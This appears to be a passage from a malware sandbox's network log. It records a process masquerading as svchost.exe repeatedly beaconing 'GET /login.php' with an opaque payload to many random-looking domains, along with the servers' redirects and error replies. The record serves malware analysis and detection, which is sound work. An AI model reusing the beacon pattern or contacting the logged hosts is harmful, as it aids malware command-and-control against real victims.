Aug 23, 2024 18:47:53.750860929 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:47:53 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:47:53.755738020 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:54.163615942 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:47:53 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49662	13.248.169.48	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:15.365961075 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49663	188.114.97.3	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:15.388293028 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:16.822725058 CEST	797	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:47:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRZg%2BUk6lrqYmvP1Cj8C9ZW2WAJf6z%2B1jFPEejCNiv98b3mL96dumiDDh96%2BelDvtABwmabNfcteNPCt5fYwzirPG%2BOCIDA0dwBB3aDl72VPhdSN%2BJsrkEK%2FfTvULQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c955bc9f17d08-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:47:19.731738091 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:20.835799932 CEST	786	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:47:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7gXySXQrf62a%2FXwM76nUfIAZ2MGqHr025izH2Uea44MHod6Vzp2g6MHML8qhY7re5mnCGWJZ6Lt9%2BLnji6mc6WhohVxqt3xZTA%2BS3lRM9auYwg60bJiGtc0zRaBlQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c9574a98d7d08-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Aug 23, 2024 18:47:20.935643911 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	51111	18.208.156.248	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:16.118697882 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:16.684410095 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523\|8.46.123.33\|1724431636\|1724431636\|0\|1\|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	51112	103.150.11.230	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:16.504283905 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:17.469763041 CEST	403	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Fri, 23 Aug 2024 16:47:17 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Aug 23, 2024 18:47:18.726305962 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:19.028413057 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:19.476067066 CEST	403	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Fri, 23 Aug 2024 16:47:19 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	51116	106.15.137.66	8001	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:17.479486942 CEST	295	OUT	GET /dh/147287063_637385.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.137.66:8001 Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:18.725167036 CEST	1043	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:47:18 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:18 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>
Aug 23, 2024 18:47:19.150254965 CEST	1043	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:47:18 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:18 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	51119	106.15.137.66	8001	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:19.486538887 CEST	295	OUT	GET /dh/147287063_637385.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.137.66:8001 Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:20.627298117 CEST	1043	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:47:20 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:20 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	51122	13.248.169.48	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:25.910887957 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	51124	64.225.91.73	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:37.474280119 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:38.185277939 CEST	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Fri, 23 Aug 2024 16:47:38 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	51125	44.221.84.105	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:37.602103949 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:38.147263050 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1\|8.46.123.33\|1724431658\|1724431658\|0\|1\|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	51128	103.224.182.252	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:37.731829882 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
